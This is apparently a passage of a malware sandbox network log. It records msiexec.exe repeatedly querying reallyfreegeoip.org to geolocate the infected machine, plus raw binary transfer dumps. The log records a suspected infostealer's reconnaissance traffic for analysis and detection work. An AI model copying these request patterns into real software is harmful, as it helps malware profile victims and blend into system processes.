                                                                                                                                                              2024-11-25 17:43:45 UTC1390INData Raw: c3 dc d7 1b be 3a a1 e2 3f 2f 56 e4 02 29 02 71 3b 00 d9 2d 0c d0 85 33 55 79 2a f8 2a 59 5a f9 ea c7 b6 27 1d b6 a8 c2 cd 64 5f 82 fa 2a 0f 69 47 85 b2 33 f1 e0 f0 a4 01 d0 f4 62 4d f7 a1 3a f8 d6 ad 00 ad 5d d9 8d dc 4e e6 d5 00 9f 4d 7f 51 1e 70 3d 08 d5 25 23 fc fd 04 30 6d 9a 00 04 2c 26 1a 9f b6 6b 06 82 97 dc 8e 75 06 72 3f 31 77 b8 30 8c a7 4d 1d 3a ce 4d 05 32 d4 77 43 62 7a a6 45 64 88 f0 83 94 d7 25 e1 43 42 d6 73 3f 7c 36 55 82 d8 a0 78 69 fd ed e0 d7 8f 36 28 31 20 da 4a 28 51 48 46 34 6d 53 1b bf 18 ea 8b 50 71 c6 d5 52 76 39 57 41 2c c5 cb 12 ea dd 2b a6 c7 fe d2 e1 54 b3 19 c6 b3 25 be 4f 5c 32 d4 6d b4 98 20 db bc 3f cc fe 74 d0 f7 9b 78 b9 7e 7b ad ed 8c 95 47 6f a8 a8 41 b4 9e 35 89 a6 54 85 ed 95 3d 5d 38 fd b3 06 db 60 28 3d f1 e5 91
                                                                                                                                                              Data Ascii: :?/V)q;-3Uy**YZ'd_*iG3bM:]NMQp=%#0m,&kur?1w0M:M2wCbzEd%CBs?|6Uxi6(1 J(QHF4mSPqRv9WA,+T%O\2m ?tx~{GoA5T=]8`(=
                                                                                                                                                              2024-11-25 17:43:45 UTC1390INData Raw: 53 6d 3b 10 c8 2c 76 90 d7 39 77 30 7e f0 29 83 2d ba dc 9f fe 95 18 58 f0 b7 ab bd e9 e0 fd ac 40 f4 a7 44 b8 fd d8 05 39 d3 d4 04 34 79 80 ae 08 dc 13 c8 c3 4e 8f be 02 b6 0d ba 60 e5 dc ab a1 db 04 65 1b 4d c6 43 7d c3 3a d3 af e0 1b 3b 1f 53 cf 77 8b 4c d0 21 db ec b7 bd a8 6e 5d 0c 41 2c 61 c2 32 cd 1a 86 72 16 9e ee 6e 60 d2 f4 4e 75 0d ef f7 f4 a0 ff f6 24 2b 77 e4 45 f3 a1 16 66 48 8e f4 c9 3e dc f7 4b fa 97 d6 40 8e 35 1a b5 ed 6d d5 56 cc 03 b5 90 22 0e bb 48 1d 71 d0 ff 11 cc 58 f8 8b dc 01 2c 61 07 69 00 75 3c 84 3a f2 dc 4b cf 7a e8 be 70 71 d5 22 2e 83 bd 45 cc 73 5f 44 1d a5 fc 5a 42 08 6f d6 9f ba 47 f8 fa d8 69 06 a4 ee c1 61 96 78 7b 9c f1 2d e6 2e 10 82 b2 c4 bf 2f 34 8c 74 da 0c b6 45 0f ce 45 27 3b 97 47 6b c9 84 c6 7c dd 90 67 a0 c7
                                                                                                                                                              Data Ascii: Sm;,v9w0~)-X@D94yN`eMC}:;SwL!n]A,a2rn`Nu$+wEfH>K@5mV"HqX,aiu<:Kzpq".Es_DZBoGiax{-./4tEE';Gk|g
                                                                                                                                                              2024-11-25 17:43:45 UTC1390INData Raw: 11 53 3e 6a d1 b0 d1 49 e7 ff 8f 5e 68 84 f1 f8 2b 7e 8d ac 4e 43 f8 17 14 3b f2 68 87 bf 68 5c 65 05 6d bd 8d 4c 84 c9 47 2d c7 c0 c7 b7 07 04 b5 ef 41 e9 28 bc f2 14 aa 27 76 ab f1 9c 1d 9d 7c 2f d2 74 6e 45 94 76 b5 0d 77 22 c7 3c 23 fe b2 ef 63 5e 66 92 e2 a5 b4 75 28 bd f9 fa c3 ea 17 61 da b0 ee 6c 4e ff 15 2a 45 32 31 2b 64 eb a9 50 df 30 25 5f d1 97 0b bf 8c 8b 9d 2d e3 b7 0a 0e 6d 37 5c 3b dc 14 55 c3 74 96 68 b9 cf e1 e1 4d 98 fc a8 13 79 c3 33 59 2b 24 97 5b 3e e4 38 1a df 97 b8 04 d1 22 67 9d 7f 45 55 23 ff 4e 14 fb 64 0c 1b 20 12 4d b7 6c eb ce 48 7a f0 f2 d9 e6 15 93 6f 4e c8 1a 73 f3 0b 57 52 1f eb f4 8f f9 f2 6e e2 53 3f d4 b9 a8 35 59 8d d6 f0 8d 49 3d 92 fb 98 ff 1f 34 3b 8e 14 9a 6c 33 01 c9 bb e3 30 48 63 0c ef 83 d9 03 a8 da cc cc 12
                                                                                                                                                              Data Ascii: S>jI^h+~NC;hh\emLG-A('v|/tnEvw"<#c^fu(alN*E21+dP0%_-m7\;UthMy3Y+$[>8"gEU#Nd MlHzoNsWRnS?5YI=4;l30Hc
                                                                                                                                                              2024-11-25 17:43:45 UTC1390INData Raw: 16 75 79 22 e7 81 49 14 6d f2 82 11 6d 03 c5 de f7 a8 45 a1 24 5c 03 c6 70 9b f6 41 05 f0 17 94 d5 d3 56 b4 74 38 08 d5 de fd 6f f1 ad 7d b2 53 9f ca 58 85 68 36 fd e8 15 2d 9c 15 7b 39 3f 94 98 b2 07 c0 61 2d ea 51 80 0d a0 c9 58 a4 db 13 81 35 ea 05 a4 99 4f b3 f5 77 47 e6 8c e7 86 59 50 ba 0e 4c f1 76 fb ae ae fa 2d 4c a6 bb 83 7a 5c 83 69 cf e3 f6 13 e7 3a a7 7a cf 3a 64 68 fe 8f 8c 3f e9 9e 96 0e 71 7f 3e fb 85 4c d9 7f 19 3a dd 3c 1e 5f 2f e7 4f 46 ce f3 f3 47 31 bc 23 89 33 68 4e 58 3b 0a 33 3a 6c f9 2f dd f2 87 55 cf 0c 1c e4 ea a1 27 7f 76 e1 94 4e 4b 15 33 1d e9 a8 1b d4 00 23 a8 d1 3f 02 29 e9 33 f2 1f 5b 31 db 73 ff 4b 72 4a 25 15 2c 6c 94 ac 15 be 79 9f fb bb 57 8e 22 c8 e9 37 22 4c dd 0b 78 61 be f4 78 a9 8d e8 98 bf 65 f4 20 97 e4 d5 0e 31
                                                                                                                                                              Data Ascii: uy"ImmE$\pAVt8o}SXh6-{9?a-QX5OwGYPLv-Lz\i:z:dh?q>L:<_/OFG1#3hNX;3:l/U'vNK3#?)3[1sKrJ%,lyW"7"Lxaxe 1
                                                                                                                                                              2024-11-25 17:43:45 UTC1390INData Raw: 2e 57 c7 7a 17 1f d2 5d 95 bd 03 22 68 f7 9d f6 d4 0c 36 39 33 20 4b 98 22 57 7b ea 33 7c 5b 1b b2 18 ea 8b 0a f4 c4 d5 28 0f c2 df 41 26 cf cc e4 95 ec 2c 9f e7 81 e9 e1 40 67 3f 05 b3 24 9c 0d 88 32 de 15 be 99 28 ba ac dd 1a fe 74 db d2 9c 01 92 a8 7b a9 cf 88 4b 57 4c ef 5c 41 b4 9e 54 63 b2 7c 97 c5 ce 37 83 32 83 f8 06 a5 4a 00 77 f5 97 0b 14 df da dd b9 91 a0 ba 96 b2 92 62 0f 85 6a 98 c7 55 8b 9c 74 21 48 69 3a 33 ce 64 94 91 de 38 f0 54 6c 0e 1d e8 c9 50 49 a6 99 9c 18 4c 2d d4 f7 d7 8b f2 05 7a af 2c fa 45 dd 9d 29 96 61 e0 ba 9c 11 45 9c a6 bf ca 26 c7 15 79 b4 69 e2 cd c4 f0 76 e5 16 8d ba e6 a1 0e 00 69 89 a3 ef f1 ce fc e9 cf 4f ba 24 82 6c bc e1 29 84 cc 75 5c 98 ef 1a 33 b8 f3 72 63 06 5b 0a 3b 85 ff 41 16 17 0e 55 92 ff c7 ea 96 2d dc d9
                                                                                                                                                              Data Ascii: .Wz]"h693 K"W{3|[(A&,@g?$2(t{KWL\ATc|72JwbjUt!Hi:3d8TlPIL-z,E)aE&yiviO$l)u\3rc[;AU-


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.549789172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:43:52 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-11-25 17:43:52 UTC846INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:43:52 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520541
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVtaUOkhFPVWXTFSl%2B36iX4dkSBURTjFMhtwn5e6ChAM3GqnyTgONLKfzV88XZmDPg2LMgQBL0QHbwQxihCCG6WJNVWOtnbXqCeoRAPVFiEGiY6JDBPUEfZeKwfktyF4amOMTAPY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e8371896c8443dc-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1655&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=698&delivery_rate=187419&cwnd=238&unsent_bytes=0&cid=fbf05ed3271e9ef8&ts=649&x=0"
                                                                                                                                                              2024-11-25 17:43:52 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.549795172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:43:54 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              2024-11-25 17:43:55 UTC851INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:43:54 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520543
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnLhL%2BK8LpVOkZDGrYhvF7Gblksi%2B0ssYHBAqlimj9RwdoTCgELxI9J3t4kpezntN14jBGDlwgqryxv4W0DXQb0oS4bdg%2BVMhZFy2dvKSGt5VBJQxdA8DTygE82u77z1eH7lSFvA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e83719848f872a5-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2013&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1435594&cwnd=210&unsent_bytes=0&cid=83334dd5378cf2ac&ts=480&x=0"
                                                                                                                                                              2024-11-25 17:43:55 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.549808172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:43:58 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-11-25 17:43:59 UTC855INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:43:59 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520548
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJ5tdOhTgbp811JKo08reI0XlWynSRcrSu53QHTx0s2q%2B9MEZSMmMsqO1ZPoHOoKAvy%2BkN09k47q6EBCJho%2Bt7H%2BXCcYv1%2B4MBBNtFe43U8lMHs1JTJbr9Zro5h19Oige3z5hUK5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e8371b2292e0c7a-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1701&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1702623&cwnd=194&unsent_bytes=0&cid=9fe9657282e2d8d8&ts=466&x=0"
                                                                                                                                                              2024-11-25 17:43:59 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.549815172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:44:02 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              2024-11-25 17:44:02 UTC854INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:44:02 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520551
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UA9Fl1Lao5ghqqbY93Ix5OYM8coEbz4WjQJabNWwOa9QoMr11%2FEGuoxnFWQ2I6EOHFFrzJl%2FnxWfIhDElTw1RiRilO2J72540%2FX0RTRqx1%2FgsXl7lq7LtP12Ge8xEhDgHCjEjN%2Bg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e8371c8bc9a0f90-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1707&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1710603&cwnd=93&unsent_bytes=0&cid=b49758daf37dfd8c&ts=481&x=0"
                                                                                                                                                              2024-11-25 17:44:02 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.549827172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:44:05 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              2024-11-25 17:44:06 UTC851INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:44:06 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520555
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RF2SVNvQAll5DqOGK0V%2FL8Gcv17Hr8ARj6d5p%2FM0Ama6n2vG3UtmtMD0uNpVdr9jd7DE17olo0dhX6EMjY0mqiYeK1o9ffavXFGCv%2BqwD4V616J8s5HccVBK9BrVJgXRdwE3HicJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e8371df3e3a0c90-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1707602&cwnd=242&unsent_bytes=0&cid=463a311d5d66f231&ts=469&x=0"
                                                                                                                                                              2024-11-25 17:44:06 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.549834172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:44:09 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              2024-11-25 17:44:09 UTC849INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:44:09 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520558
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dr1B3da9qPJY9RqaYfvusM39ZFQH0QdmbkJ9j8YDl%2BFwmpTzNtppvCmJJAlIwGoSlm8lSB9za03T6c64f2pRZYos0LedFXzuCXBsK7RVIbxIjooWNK3iVK036bZCQlrgIhuz%2BDCW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e8371f458f4c427-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1485&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1898569&cwnd=243&unsent_bytes=0&cid=1d69630042d2c74a&ts=483&x=0"
                                                                                                                                                              2024-11-25 17:44:09 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.549846172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:44:12 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-11-25 17:44:13 UTC852INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:44:13 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520562
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wbNNF11gcb4AtlmY2F6kMYvMgnSUXW20NyWsEJqozyKzi9EgB4vluXqWdIRSf%2F0B24XWYeOqcVI%2F%2BeCC2CH4p6si9vMYXqvNoglTpS8e7aGcDSPrXanYeiCyXGjJmQyIN1u%2B0Y3V"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e83720a2bbdc439-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
